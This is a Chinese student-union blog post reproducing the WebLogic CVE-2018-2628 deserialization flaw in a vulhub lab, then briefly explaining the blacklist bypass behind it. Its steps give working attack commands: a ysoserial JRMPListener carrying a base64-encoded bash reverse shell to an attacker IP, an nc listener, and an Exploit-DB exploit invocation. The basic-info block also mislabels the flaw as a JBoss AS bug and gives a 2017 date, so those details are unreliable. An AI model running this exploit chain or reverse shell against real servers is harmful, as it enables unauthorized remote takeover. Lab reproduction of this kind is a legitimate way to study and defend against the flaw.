學生會私房菜

學生會私房菜是通過學生會信箱收集同學們的來稿，挑選其中的優質文檔，不定期進行文檔推送的主題。

本期文檔內容為：Weblogic WLS核心組件反序列化命令執行突破(CVE-2018-2628)漏洞復現》

作者介紹：Chow

Chow，一個行走的“十萬個為什么”，喜歡學自己興趣所向的知識，雖然現在還是個弱雞，但是學就完事啦！

一、基本信息

一.?基本概要

發布時間：2017年11月22日

漏洞名稱：JBOSSAS5.x/6.x反序列化命令執行漏洞

威脅類型：遠程命令執行

CVE編號：CVE-2018-2628

影響版本：Weblogic 10.3.6.0、Weblogic 12.1.3.0、Weblogic 12.2.1.2、Weblogic 12.2.1.3

漏洞描述：CVE-2018-2628為CVE-2017-3248修復版本的繞過，遠程攻擊者可利用該漏洞在未授權的情況下發送攻擊數據，并可獲取目標系統所有權限。

二、基本環境和工具

1. 靶機環境：

靶機操作系統：Ubuntu

漏洞環境：https://vulhub.org/#/environments/weblogic/CVE-2018-2628/

下載：https://vulhub.org/#/docs/install-docker-one-click/

使用說明：

執行以下命令啟動Weblogic 10.3.6.0：

cd vulhub/weblogic/CVE-2018-2628

docker-compose up -d

? ?訪問訪問http://your-ip:7001/console，初始化整個環境。

2. 操作機環境：

操作操作系統:Kail

檢測和發現工具

工具名稱：CVE-2018-2628-MultiThreading

工具安裝：下載.py文件即可

工具使用說明：2-操作機批量檢測腳本CVE-2018-2628-MultiThreading使用說明.doc

工具下載地址：https://github.com/aedoo/CVE-2018-2628-MultiThreading

3、EXP/利用工具

工具名稱：44553

工具安裝：下載.py文件即可

使用說明：參閱漏洞利用步驟即可

下載地址：https://www.exploit-db.com/exploits/44553

需要配合ysoserial

ysoserial(下載地址:https://github.com/brianwrf/ysoserial/releases/tag/0.0.6-pri-beta)

三、利用過程

(詳細說明漏洞的利用過程，要求以拿到webshell權限為利用過程)

1.?利用的條件/漏洞特征

利用Kail下的nmap工具，檢測weblogic版本信息和t3協議是否開啟。

2. 漏洞利用步驟：

步驟1??開啟監聽服務JRMPListen

本地開啟監聽服務JRMPListen，利用ysoserial的JRMP對998端口監聽

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

#[command]即為想執行的命令，而[listen port]是JRMP Server監聽的端口。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 998 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2MC4xMjkvNjc2NyAwPiYx}|{base64,-d}|{bash,-i}" ? #引號內為反彈shell到192.168.160.129 6767端口經過base64加密后的指令

步驟2??新開一個終端，監聽反彈shell的端口

nc -lvp 6767

步驟3??利用exploit腳本攻擊

命令：python exploit.py [目標ip] [目標port] [ysoserial路徑] [JRMPListener ip] [JRMPListener port] [JRMPClient]

#目標ip就是weblogic的ip。端口weblogic的端口

#ysoserial路徑就是上方使用的ysoserial的路徑

#JRMPListener port為主機端口，就是我使用的Kail，監聽端口上方998

#JRMPClient命令執行。[JRMPClient]是執行JRMPClient的類，可選的值是JRMPClient或JRMPClient2

python CVE-2018-2628exploit.py 192.168.160.134 7001 ysoserial-0.0.6-SNAPSHOT-all.jar 192.168.160.129 998 JRMPClient

步驟4 ?成功反彈shell

四、原理分析

CVE-2018-2628原理為在CVE-2017-3248補丁中用黑名單的方式在weblogic.rjvm.InboundMsgAbbrev$ServerChannelInputStream.class多了一個resolveProxyClass處理rmi接口類型，這個resolveProxyClass只對 java.rmi.registry.Registry接口進行了判斷，找一個其他的rmi接口即可繞過，比如java.rmi.activation.Activator。

國科學院學生會是由國科學院指導開展的學員服務型組織，致力于配合國科學院完成日常工作的開展以及強化鍛煉學員的自身職業素養與專業技能，下設部門有技術部和綜合部。

如果你們也想提升自我，又或者是想認識這些和你們一樣優秀的小伙伴，那就趕快聯系指導老師并加入我們吧！

學生會信箱：

student@goktech.cn

【往期精彩內容】

國科學院學生會的“小確幸”瓶子，你能涂滿幾個？

學生會私房菜【202008011期】《Apache Shiro 1.2.4反序列化漏洞》

學生會私房菜【20200804期】String詳解

學生會私房菜【20200723期】S2-045 Remote Code Execution漏洞利用

聚資訊，融技術，訪精英▏【學生會信箱】開通啦！

講師預備生唐歡——加入國科遇見更優秀的自己

王少懷

國科學院(廈門基地)學生會指導老師

王陽

國科學院(泉州基地)學生會指導老師

王建

國科學院(福州基地)學生會指導老師

曹博文??

國科學院(成都基地)學生會指導老師

總結

以上是生活随笔為你收集整理的java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破（CVE20182628）漏洞复现...的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。